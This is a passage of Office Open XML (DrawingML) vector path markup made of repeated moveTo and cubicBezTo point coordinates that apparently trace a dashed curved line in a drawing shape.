                    <a:pt x="327" y="1826"/>
                    <a:pt x="322" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1820"/>
                    <a:pt x="318" y="1820"/>
                    <a:pt x="317" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="1823"/>
                    <a:pt x="315" y="1826"/>
                    <a:pt x="317" y="1827"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1832"/>
                    <a:pt x="326" y="1837"/>
                    <a:pt x="331" y="1841"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="1843"/>
                    <a:pt x="335" y="1843"/>
                    <a:pt x="337" y="1841"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="1840"/>
                    <a:pt x="338" y="1837"/>
                    <a:pt x="337" y="1836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="1836"/>
                    <a:pt x="337" y="1836"/>
                    <a:pt x="337" y="1836"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="1863"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="1858"/>
                    <a:pt x="356" y="1854"/>
                    <a:pt x="351" y="1849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="1848"/>
                    <a:pt x="347" y="1848"/>
                    <a:pt x="345" y="1849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="1851"/>
                    <a:pt x="344" y="1854"/>
                    <a:pt x="346" y="1855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="1860"/>
                    <a:pt x="356" y="1864"/>
                    <a:pt x="361" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="1870"/>
                    <a:pt x="365" y="1870"/>
                    <a:pt x="366" y="1868"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="1867"/>
                    <a:pt x="368" y="1864"/>
                    <a:pt x="366" y="1863"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="1888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="1884"/>
                    <a:pt x="386" y="1880"/>
                    <a:pt x="381" y="1876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="1874"/>
                    <a:pt x="377" y="1874"/>
                    <a:pt x="375" y="1876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="1878"/>
                    <a:pt x="374" y="1880"/>
                    <a:pt x="376" y="1882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="1886"/>
                    <a:pt x="386" y="1890"/>
                    <a:pt x="391" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="1896"/>
                    <a:pt x="395" y="1896"/>
                    <a:pt x="397" y="1894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="1892"/>
                    <a:pt x="398" y="1890"/>
                    <a:pt x="396" y="1888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="1888"/>
                    <a:pt x="396" y="1888"/>
                    <a:pt x="396" y="1888"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="1913"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="422" y="1909"/>
                    <a:pt x="417" y="1905"/>
                    <a:pt x="412" y="1901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="1900"/>
                    <a:pt x="408" y="1900"/>
                    <a:pt x="406" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="1903"/>
                    <a:pt x="405" y="1906"/>
                    <a:pt x="407" y="1907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="1911"/>
                    <a:pt x="417" y="1916"/>
                    <a:pt x="423" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="1921"/>
                    <a:pt x="427" y="1921"/>
                    <a:pt x="428" y="1919"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="1917"/>
                    <a:pt x="429" y="1915"/>
                    <a:pt x="428" y="1913"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="1937"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="1933"/>
                    <a:pt x="449" y="1929"/>
                    <a:pt x="444" y="1925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="1924"/>
                    <a:pt x="439" y="1924"/>
                    <a:pt x="438" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="1928"/>
                    <a:pt x="437" y="1930"/>
                    <a:pt x="439" y="1932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="444" y="1936"/>
                    <a:pt x="450" y="1940"/>
                    <a:pt x="455" y="1943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="1945"/>
                    <a:pt x="460" y="1944"/>
                    <a:pt x="461" y="1942"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462" y="1941"/>
                    <a:pt x="462" y="1938"/>
                    <a:pt x="460" y="1937"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="1959"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="1956"/>
                    <a:pt x="482" y="1952"/>
                    <a:pt x="476" y="1948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474" y="1947"/>
                    <a:pt x="472" y="1947"/>
                    <a:pt x="471" y="1949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="1951"/>
                    <a:pt x="470" y="1954"/>
                    <a:pt x="472" y="1955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="1959"/>
                    <a:pt x="483" y="1962"/>
                    <a:pt x="489" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="490" y="1967"/>
                    <a:pt x="493" y="1967"/>
                    <a:pt x="494" y="1965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="1963"/>
                    <a:pt x="495" y="1960"/>
                    <a:pt x="493" y="1959"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="1980"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="1977"/>
                    <a:pt x="515" y="1973"/>
                    <a:pt x="510" y="1970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1969"/>
                    <a:pt x="505" y="1969"/>
                    <a:pt x="504" y="1971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1973"/>
                    <a:pt x="504" y="1975"/>
                    <a:pt x="506" y="1977"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="1980"/>
                    <a:pt x="517" y="1984"/>
                    <a:pt x="523" y="1987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1988"/>
                    <a:pt x="527" y="1988"/>
                    <a:pt x="528" y="1986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="529" y="1984"/>
                    <a:pt x="529" y="1981"/>
                    <a:pt x="527" y="1980"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="527" y="1980"/>
                    <a:pt x="527" y="1980"/>
                    <a:pt x="527" y="1980"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="562" y="2000"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="1997"/>
                    <a:pt x="550" y="1994"/>
                    <a:pt x="544" y="1990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="542" y="1989"/>
                    <a:pt x="540" y="1990"/>
                    <a:pt x="539" y="1992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="538" y="1994"/>
                    <a:pt x="538" y="1996"/>
                    <a:pt x="540" y="1997"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="2001"/>
                    <a:pt x="552" y="2004"/>
                    <a:pt x="558" y="2007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="2008"/>
                    <a:pt x="562" y="2007"/>
                    <a:pt x="563" y="2005"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="2004"/>
                    <a:pt x="564" y="2001"/>
                    <a:pt x="562" y="2000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="562" y="2000"/>
                    <a:pt x="562" y="2000"/>
                    <a:pt x="562" y="2000"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="597" y="2019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="2016"/>
                    <a:pt x="585" y="2013"/>
                    <a:pt x="579" y="2009"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="577" y="2008"/>
                    <a:pt x="575" y="2009"/>
                    <a:pt x="574" y="2011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="2013"/>
                    <a:pt x="574" y="2016"/>
                    <a:pt x="576" y="2017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="582" y="2020"/>
                    <a:pt x="588" y="2023"/>
                    <a:pt x="594" y="2026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="596" y="2027"/>
                    <a:pt x="598" y="2026"/>
                    <a:pt x="599" y="2024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="2022"/>
                    <a:pt x="599" y="2020"/>
                    <a:pt x="597" y="2019"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="633" y="2036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="2033"/>
                    <a:pt x="621" y="2030"/>
                    <a:pt x="615" y="2027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="613" y="2026"/>
                    <a:pt x="611" y="2027"/>
                    <a:pt x="610" y="2029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="609" y="2031"/>
                    <a:pt x="610" y="2034"/>
                    <a:pt x="612" y="2035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="618" y="2037"/>
                    <a:pt x="624" y="2040"/>
                    <a:pt x="630" y="2043"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="632" y="2044"/>
                    <a:pt x="634" y="2043"/>
                    <a:pt x="635" y="2041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="2039"/>
                    <a:pt x="635" y="2037"/>
                    <a:pt x="633" y="2036"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="670" y="2051"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="2049"/>
                    <a:pt x="658" y="2046"/>
                    <a:pt x="652" y="2044"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="650" y="2043"/>
                    <a:pt x="647" y="2044"/>
                    <a:pt x="646" y="2046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="645" y="2048"/>
                    <a:pt x="646" y="2050"/>
                    <a:pt x="648" y="2051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="655" y="2054"/>
                    <a:pt x="661" y="2056"/>
                    <a:pt x="667" y="2059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="2060"/>
                    <a:pt x="671" y="2059"/>
                    <a:pt x="672" y="2057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="673" y="2055"/>
                    <a:pt x="672" y="2052"/>
                    <a:pt x="670" y="2051"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="707" y="2066"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="2064"/>
                    <a:pt x="695" y="2061"/>
                    <a:pt x="689" y="2059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="687" y="2058"/>
                    <a:pt x="684" y="2059"/>
                    <a:pt x="683" y="2061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="2063"/>
                    <a:pt x="684" y="2065"/>
                    <a:pt x="686" y="2066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="692" y="2069"/>
                    <a:pt x="698" y="2071"/>
                    <a:pt x="705" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="707" y="2074"/>
                    <a:pt x="709" y="2073"/>
                    <a:pt x="710" y="2071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="2069"/>
                    <a:pt x="709" y="2067"/>
                    <a:pt x="707" y="2066"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="745" y="2079"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="2077"/>
                    <a:pt x="733" y="2075"/>
                    <a:pt x="726" y="2072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="2072"/>
                    <a:pt x="722" y="2073"/>
                    <a:pt x="721" y="2075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="720" y="2077"/>
                    <a:pt x="722" y="2079"/>
                    <a:pt x="724" y="2080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="730" y="2082"/>
                    <a:pt x="736" y="2084"/>
                    <a:pt x="743" y="2086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="745" y="2087"/>
                    <a:pt x="747" y="2086"/>
                    <a:pt x="748" y="2084"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="749" y="2082"/>
                    <a:pt x="747" y="2079"/>
                    <a:pt x="745" y="2079"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="784" y="2090"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="2088"/>
                    <a:pt x="771" y="2087"/>
                    <a:pt x="764" y="2085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="762" y="2084"/>
                    <a:pt x="760" y="2085"/>
                    <a:pt x="759" y="2087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="759" y="2089"/>
                    <a:pt x="760" y="2092"/>
                    <a:pt x="762" y="2092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="2094"/>
                    <a:pt x="775" y="2096"/>
                    <a:pt x="781" y="2098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="784" y="2098"/>
                    <a:pt x="786" y="2097"/>
                    <a:pt x="786" y="2095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="787" y="2093"/>
                    <a:pt x="786" y="2091"/>
                    <a:pt x="784" y="2090"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="822" y="2100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="2099"/>
                    <a:pt x="809" y="2097"/>
                    <a:pt x="803" y="2095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="801" y="2095"/>
                    <a:pt x="798" y="2096"/>
                    <a:pt x="798" y="2098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="2100"/>
                    <a:pt x="799" y="2103"/>
                    <a:pt x="801" y="2103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="807" y="2105"/>
                    <a:pt x="814" y="2106"/>
                    <a:pt x="820" y="2108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="2108"/>
                    <a:pt x="825" y="2107"/>
                    <a:pt x="825" y="2105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="826" y="2103"/>
                    <a:pt x="824" y="2101"/>
                    <a:pt x="822" y="2100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="2100"/>
                    <a:pt x="822" y="2100"/>
                    <a:pt x="822" y="2100"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="861" y="2109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="2107"/>
                    <a:pt x="848" y="2106"/>
                    <a:pt x="842" y="2105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="2104"/>
                    <a:pt x="837" y="2105"/>
                    <a:pt x="837" y="2108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="836" y="2110"/>
                    <a:pt x="838" y="2112"/>
                    <a:pt x="840" y="2112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="846" y="2114"/>
                    <a:pt x="853" y="2115"/>
                    <a:pt x="860" y="2117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="862" y="2117"/>
                    <a:pt x="864" y="2116"/>
                    <a:pt x="864" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="865" y="2111"/>
                    <a:pt x="863" y="2109"/>
                    <a:pt x="861" y="2109"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="900" y="2116"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="2115"/>
                    <a:pt x="887" y="2114"/>
                    <a:pt x="881" y="2112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="879" y="2112"/>
                    <a:pt x="876" y="2113"/>
                    <a:pt x="876" y="2116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="876" y="2118"/>
                    <a:pt x="877" y="2120"/>
                    <a:pt x="879" y="2120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="886" y="2121"/>
                    <a:pt x="893" y="2123"/>
                    <a:pt x="899" y="2124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="901" y="2124"/>
                    <a:pt x="903" y="2122"/>
                    <a:pt x="904" y="2120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="904" y="2118"/>
                    <a:pt x="903" y="2116"/>
                    <a:pt x="900" y="2116"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="940" y="2121"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="933" y="2120"/>
                    <a:pt x="927" y="2120"/>
                    <a:pt x="920" y="2119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="918" y="2118"/>
                    <a:pt x="916" y="2120"/>
                    <a:pt x="916" y="2122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="915" y="2124"/>
                    <a:pt x="917" y="2126"/>
                    <a:pt x="919" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="926" y="2128"/>
                    <a:pt x="932" y="2128"/>
                    <a:pt x="939" y="2129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="941" y="2129"/>
                    <a:pt x="943" y="2128"/>
                    <a:pt x="943" y="2126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="944" y="2124"/>
                    <a:pt x="942" y="2122"/>
                    <a:pt x="940" y="2121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="2121"/>
                    <a:pt x="940" y="2121"/>
                    <a:pt x="940" y="2121"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="980" y="2125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="973" y="2125"/>
                    <a:pt x="966" y="2124"/>
                    <a:pt x="960" y="2123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="958" y="2123"/>
                    <a:pt x="956" y="2125"/>
                    <a:pt x="955" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="955" y="2129"/>
                    <a:pt x="957" y="2131"/>
                    <a:pt x="959" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="966" y="2132"/>
                    <a:pt x="972" y="2133"/>
                    <a:pt x="979" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="981" y="2133"/>
                    <a:pt x="983" y="2132"/>
                    <a:pt x="983" y="2130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="983" y="2127"/>
                    <a:pt x="982" y="2125"/>
                    <a:pt x="980" y="2125"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1019" y="2128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1013" y="2128"/>
                    <a:pt x="1006" y="2127"/>
                    <a:pt x="1000" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="997" y="2127"/>
                    <a:pt x="995" y="2128"/>
                    <a:pt x="995" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="995" y="2133"/>
                    <a:pt x="997" y="2135"/>
                    <a:pt x="999" y="2135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1006" y="2135"/>
                    <a:pt x="1012" y="2136"/>
                    <a:pt x="1019" y="2136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1021" y="2136"/>
                    <a:pt x="1023" y="2134"/>
                    <a:pt x="1023" y="2132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1023" y="2130"/>
                    <a:pt x="1022" y="2128"/>
                    <a:pt x="1019" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1019" y="2128"/>
                    <a:pt x="1019" y="2128"/>
                    <a:pt x="1019" y="2128"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1059" y="2129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1053" y="2129"/>
                    <a:pt x="1046" y="2129"/>
                    <a:pt x="1039" y="2129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1037" y="2129"/>
                    <a:pt x="1035" y="2130"/>
                    <a:pt x="1035" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1035" y="2135"/>
                    <a:pt x="1037" y="2137"/>
                    <a:pt x="1039" y="2137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1046" y="2137"/>
                    <a:pt x="1053" y="2137"/>
                    <a:pt x="1059" y="2137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1061" y="2137"/>
                    <a:pt x="1063" y="2135"/>
                    <a:pt x="1063" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1063" y="2131"/>
                    <a:pt x="1062" y="2129"/>
                    <a:pt x="1059" y="2129"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1099" y="2129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1093" y="2129"/>
                    <a:pt x="1086" y="2129"/>
                    <a:pt x="1079" y="2129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1077" y="2129"/>
                    <a:pt x="1075" y="2131"/>
                    <a:pt x="1075" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="2135"/>
                    <a:pt x="1077" y="2137"/>
                    <a:pt x="1079" y="2137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1086" y="2137"/>
                    <a:pt x="1093" y="2137"/>
                    <a:pt x="1099" y="2137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1102" y="2137"/>
                    <a:pt x="1103" y="2135"/>
                    <a:pt x="1103" y="2132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="2130"/>
                    <a:pt x="1101" y="2129"/>
                    <a:pt x="1099" y="2129"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1139" y="2127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1132" y="2127"/>
                    <a:pt x="1126" y="2128"/>
                    <a:pt x="1119" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1117" y="2128"/>
                    <a:pt x="1115" y="2130"/>
                    <a:pt x="1115" y="2132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1115" y="2134"/>
                    <a:pt x="1117" y="2136"/>
                    <a:pt x="1120" y="2136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1126" y="2136"/>
                    <a:pt x="1133" y="2135"/>
                    <a:pt x="1140" y="2135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1142" y="2135"/>
                    <a:pt x="1143" y="2133"/>
                    <a:pt x="1143" y="2130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1143" y="2128"/>
                    <a:pt x="1141" y="2127"/>
                    <a:pt x="1139" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1139" y="2127"/>
                    <a:pt x="1139" y="2127"/>
                    <a:pt x="1139" y="2127"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1179" y="2123"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1172" y="2124"/>
                    <a:pt x="1166" y="2125"/>
                    <a:pt x="1159" y="2125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1157" y="2125"/>
                    <a:pt x="1155" y="2127"/>
                    <a:pt x="1155" y="2130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1156" y="2132"/>
                    <a:pt x="1157" y="2133"/>
                    <a:pt x="1160" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1166" y="2133"/>
                    <a:pt x="1173" y="2132"/>
                    <a:pt x="1180" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1182" y="2131"/>
                    <a:pt x="1183" y="2129"/>
                    <a:pt x="1183" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1183" y="2125"/>
                    <a:pt x="1181" y="2123"/>
                    <a:pt x="1179" y="2123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="2123"/>
                    <a:pt x="1179" y="2123"/>
                    <a:pt x="1179" y="2123"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1218" y="2119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1212" y="2119"/>
                    <a:pt x="1205" y="2120"/>
                    <a:pt x="1199" y="2121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1196" y="2121"/>
                    <a:pt x="1195" y="2123"/>
                    <a:pt x="1195" y="2126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1195" y="2128"/>
                    <a:pt x="1197" y="2129"/>
                    <a:pt x="1200" y="2129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1206" y="2128"/>
                    <a:pt x="1213" y="2127"/>
                    <a:pt x="1220" y="2126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1222" y="2126"/>
                    <a:pt x="1223" y="2124"/>
                    <a:pt x="1223" y="2122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1223" y="2120"/>
                    <a:pt x="1221" y="2118"/>
                    <a:pt x="1218" y="2119"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1258" y="2112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1251" y="2113"/>
                    <a:pt x="1245" y="2115"/>
                    <a:pt x="1238" y="2116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1236" y="2116"/>
                    <a:pt x="1235" y="2118"/>
                    <a:pt x="1235" y="2120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1235" y="2122"/>
                    <a:pt x="1237" y="2124"/>
                    <a:pt x="1239" y="2123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1246" y="2122"/>
                    <a:pt x="1253" y="2121"/>
                    <a:pt x="1259" y="2120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
